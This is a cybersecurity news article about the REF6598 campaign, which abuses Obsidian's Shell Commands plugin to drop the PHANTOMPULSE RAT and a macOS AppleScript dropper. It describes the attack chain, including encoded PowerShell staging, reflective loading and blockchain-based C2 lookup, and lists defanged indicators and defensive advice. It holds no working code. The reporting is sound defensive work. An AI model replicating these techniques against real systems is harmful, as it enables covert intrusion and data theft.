Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
AsyncRAT Campaign Leverages ScreenConnect to Evade Detection
July 2, 2026
AsyncRAT Campaign Exploits Cloudflare Tunnels and Python for Malware Delivery
July 2, 2026
New Microsoft 365 Phishing Uses OAuth Device Code Flow to Steal Tokens
July 2, 2026
Home/Threats/Critical Obsidian Shell Commands Plugin Vulnerability Lets Attackers Run Malware
Threats

Critical Obsidian Shell Commands Plugin Vulnerability Lets Attackers Run Malware

Key Takeaways A new attack campaign, REF6598, is leveraging the legitimate Obsidian Shell Commands community plugin to deploy cross-platform malware. The attacks target individuals in the financial...

Emy Elsamnoudy
Emy Elsamnoudy
April 14, 2026 4 Min Read
28 0

Key Takeaways

  • A new attack campaign, REF6598, is leveraging the legitimate Obsidian Shell Commands community plugin to deploy cross-platform malware.
  • The attacks target individuals in the financial and cryptocurrency sectors through sophisticated social engineering tactics.
  • The plugin is weaponized to execute malicious code automatically when an attacker-controlled Obsidian vault is opened, bypassing traditional software vulnerabilities.
  • The campaign deploys a new Windows RAT, PHANTOMPULSE, and an AppleScript dropper for macOS, both designed for stealthy execution and C2 communication.
  • No official patch is required for Obsidian itself, but users must be vigilant about plugin sources and social engineering attempts.

Cybersecurity researchers have uncovered a novel attack vector exploiting a popular productivity tool, the Obsidian Shell Commands plugin, to deliver sophisticated cross-platform malware. This method allows threat actors to execute malicious payloads across Windows and macOS systems by weaponizing a trusted community plugin, as detailed in a recent report.

Table Of Content

  • Key Takeaways
  • REF6598 Targets Financial and Crypto Sectors
  • Multi-Platform Malware Deployment
  • From Vault Sync to Final Payload
  • What You Should Do

The attackers effectively bypass typical software vulnerabilities by configuring the Obsidian Shell Commands plugin to run arbitrary shell commands. This allows them to execute malicious code silently on victims’ machines, leveraging the plugin’s intended functionality for nefarious purposes.

REF6598 Targets Financial and Crypto Sectors

Dubbed REF6598, the campaign specifically targets professionals within the financial and cryptocurrency industries. The initial approach involves elaborate social engineering, where attackers impersonate venture capital representatives on LinkedIn. Once a target engages, communications are steered to a Telegram group, where additional fake “partners” are introduced to enhance credibility.

Victims are then instructed to use Obsidian, presented as the venture firm’s proprietary management database. They are provided with credentials to access a cloud-hosted vault entirely controlled by the attackers. This seemingly legitimate interaction sets the stage for the compromise.

Elastic Security Labs researchers, including Salim Bitam, Samir Bousseaden, and Daniel Stepanic, identified the campaign after an Elastic Defend alert flagged suspicious PowerShell activity originating from Obsidian. Their investigation confirmed that the Shell Commands plugin, pre-configured within the malicious vault, was set to execute attacker-defined commands immediately upon the vault’s opening, requiring no further user interaction.

Multi-Platform Malware Deployment

The REF6598 campaign is designed for both Windows and macOS environments. On Windows, the attack chain culminates in the deployment of PHANTOMPULSE, a previously undocumented Remote Access Trojan (RAT). This full-featured backdoor is capable of extensive surveillance and control, including keylogging, screenshot capture, process injection, and privilege escalation.

For macOS systems, the attack employs an obfuscated AppleScript dropper, which establishes command-and-control (C2) communication via a Telegram-based fallback mechanism. Both Windows and macOS payloads are engineered to blend with normal application behavior, making them challenging for conventional detection methods to identify.

From Vault Sync to Final Payload

The infection process begins when a victim opens the attacker-controlled Obsidian vault and enables community plugin synchronization. At this point, the trojanized Shell Commands plugin’s data.json configuration file is silently downloaded and triggers execution.

On Windows, the plugin initiates two Invoke-Expression calls containing Base64-encoded strings. These calls communicate with a staging server at 195.3.222[.]251 to retrieve a PowerShell script. This script then utilizes BitsTransfer to download a 64-bit executable, syncobs.exe, while providing status updates to the C2 server with color-coded messages like “GREEN FILE FOUND ON PC” or “RED DOWNLOAD ERROR.”

The downloaded executable, dubbed PHANTOMPULL by researchers, decrypts an AES-256-CBC-encrypted payload from its own resources and loads it directly into memory using reflective loading. This “fileless” approach ensures the final malware stage is never written to disk, complicating detection by file-based scanning tools. PHANTOMPULL also incorporates a timer queue callback with a 50-millisecond delay, a common anti-sandbox technique. Furthermore, the loader includes dead code blocks and a fake integrity check function, designed to mislead and waste the time of reverse engineers.

PHANTOMPULSE, the ultimate RAT payload, employs a unique C2 resolution technique that leverages public Ethereum blockchain data. The malware queries Blockscout APIs across three distinct blockchain networks, extracting XOR-encrypted C2 URLs from the input fields of transactions linked to a hardcoded wallet address. Researchers identified a critical flaw in this design: since PHANTOMPULSE always selects the most recent transaction without sender verification, anyone with the wallet address and XOR key could submit a new transaction to redirect all infected hosts to a sinkhole server, effectively neutralizing the threat actors’ control.

What You Should Do

  • Exercise Extreme Caution with Plugins: Avoid installing community plugins from untrusted sources. Always verify the legitimacy and reputation of any plugin before enabling it in Obsidian or similar applications.
  • Implement Strong Social Engineering Awareness: Educate employees, especially those in financial and cryptocurrency roles, about sophisticated phishing and social engineering tactics, particularly those involving professional networking platforms like LinkedIn and encrypted messaging apps.
  • Monitor Electron-based Application Behavior: Organizations should enhance monitoring for unusual child process creation originating from Electron-based applications like Obsidian. Behavioral endpoint detection and response (EDR) solutions are crucial for this.
  • Enforce Plugin Policies: Where possible, establish and enforce clear policies regarding the installation and synchronization of community plugins in productivity tools.
  • Block Known Infrastructure: Update network defenses to block known malicious infrastructure, including the IP address 195.3.222[.]251 and domain panel.fefea22134[.]net.
  • Utilize Detection Signatures: Security teams should integrate Elastic’s published YARA rules for PHANTOMPULL and PHANTOMPULSE into their detection systems to identify these specific threats across their environments.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackExploitMalwareSecurityThreatVulnerability

Share Article

Emy Elsamnoudy

Emy Elsamnoudy

Emy is a cybersecurity analyst and reporter specializing in threat hunting, defense strategies, and industry trends. With expertise in proactive security measures, Emily covers the tools and techniques organizations use to detect and prevent cyber attacks. She is a regular speaker at security conferences and has contributed to industry reports on threat intelligence and security operations. Emily's reporting focuses on helping organizations improve their security posture through practical, actionable insights.

Previous Post

Okta AuthN Bypass Vulnerability Lets Attackers Impersonate Users

Next Post

Janela RAT Campaign Uses Fake MSI and Malicious Browser Extensions to Steal Data

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Citrix Bleed (CVE-2023-4966) Critical Vulnerability Actively Exploited
July 2, 2026
DHS Confirms Breach of HSIN Information Sharing Network
July 2, 2026
ChatGPT Flaw Exposes User Files, Poses System Access Risk
July 2, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us